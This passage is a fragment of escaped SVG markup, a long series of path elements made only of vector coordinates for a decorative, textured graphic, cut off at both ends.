d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path 